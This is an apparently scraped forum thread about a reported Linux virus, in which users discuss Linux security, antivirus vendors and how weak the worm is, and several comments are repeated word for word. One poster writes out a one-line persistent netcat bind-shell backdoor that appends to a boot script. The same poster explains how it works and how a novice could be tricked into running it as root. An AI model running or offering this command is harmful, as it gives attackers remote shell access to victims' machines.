Replying to A Linux Virus Discovered On 19 Th., Feb

Viruses/Worms for Linux don't really surprise me, because there was bound to be some jerk around trying to do harm to other people using linux someday, and the ever-increasing number of linux users (especially those who really don't know much on using it, which is quite natural) makes linux a particularly appealing target for viruses in a near future.

Linux viruses aren't unheard of, however... In my own opinion, things as rootkits, which allow access to root through memory stack hacking and buffer overflow, should be classified as viruses, even if they're useful to some people who often forget or mistype their root passwords. Remember that a virus doesn't always have to self-propagate through various machines.

Linux viruses are not quite heard about, and a major anti-virus firm coming out with a warning for Linux seems like a PR and/or scare tactic. Automatic installation and even remote installation of a malacious object in a Linux OS is fairly difficult. It is vital to have a firewall, whichever OS one's running and for linux users, who're much more involved with their systems and are generally more aware of the "computing' world around them, this is much of a given.

The thing with Linux users is that much of the software that is used is usually opensource. This is of course very disturbing to companies manufacturing software and especially so for anti-virus firms, since they have a cash cow in renuals itself. With huge swathes of users - especially the young who adapt to Linux so very easily, using Linux, the large companies of the world, non-OS producing (mainly the supporting software) are very worried with the trend.

As far as I can tell, the next few years will see a concerted effort to try the very foundations of Linux for it's strength, much sponsored by large corporations. And Linux will evolve. Like it always has.

I think symantec tells us by this warning that they are into making linux viruses ooops i meant anti-virus

Mc Afee already has a version for Linux as well for AIX, since a long time.

echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local

neat stuff : will try it and see how it works ....

yes linux is very configurable. But Distros like Ubuntu make it hard for people to configure things without knowing what they are doing. Windows could also be very configurable but they choose not to.

In my opnion the code quality of Linux and Windows is comparable. The only difference is that whenever a bug comes out , any one can correct it , where in MS it has to be Bob Smith (son of Jhon Smith) who is on vaction to the carribian after he got a big bonus for adding glitter to the START button.

on a correctly configured server, this worm is pretty lame.

it does not attempt to exploit any privilage esculation exploits.

and therefor is limited in access to the privilages of the running, exploitable server.

basically, it has just enough access to pass on the worm to anouther exploitable server.

this worm is basically an automated chain letter.

The threat level of very low given in the link on post one seems very accurate.

EDIT

i think the most greatest thread in linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users not the root or else to open ports for incoming connections so hackers could get into your machine, but as i said, that's for now, i think the problem will be in the future when they could make a virus that can log off from ordinary user and then login again as a root, delete all your files, open ports for hackers, steal your pc and run away

Linux rocks... its so insanely configuable, and its so easy to do anything.

for example... one could program a back-door *torjan* in a single line....

echo " nc -l 6666 -e /bin/bash" >> /etc/init.d/local

that code adds a line to the boot script that runs a command on every boot.

that command listens on port 6666, and forwads all information that arives on port 6666 to bash... ( the comand line executor )
and in return, all bash output it sent back to the attacker via netcat.

linux is very configuarable...

and more and more computer ilitarates are using linux...

how easy would it be to fool a linux newb to running the above command with root privilages... they dont know what it means.

Any Operating system is only as secure as the Admin makes it.

Security holes will always exist while less than perfect people hold the root password.

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.

i think the most greatest thread in linux viruses for now is to remove data or format /home or any other file that is permitted to be used by ordinary users not the root or else to open ports for incoming connections so hackers could get into your machine, but as i said, that's for now, i think the problem will be in the future when they could make a virus that can log off from ordinary user and then login again as a root, delete all your files, open ports for hackers, steal your pc and run away

i don't like to save any important files on my pc, or else why did they invent backup systems, cds, dvds, zip disks or even flash memories?

A fact very important is that now viruses come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linus systems.

the forst computer virus/worm spread by a buffer overflow in sendmail running on Unix systems.

People were writing bad code before bill gates even though of starting microsoft.

A fact very important is that now viruses come infecting Linux systems. A while ago we knew that viruses were infecting only Microsoft systems. Now they start infecting Linus systems.

but aren't the viruses on Linux systems open source? lol. And, would the viruses have to be downloaded on ROOT account? Plus, they would have to be easy to remove unlike Windows viruses which attack vital system files & the registry.

[N]F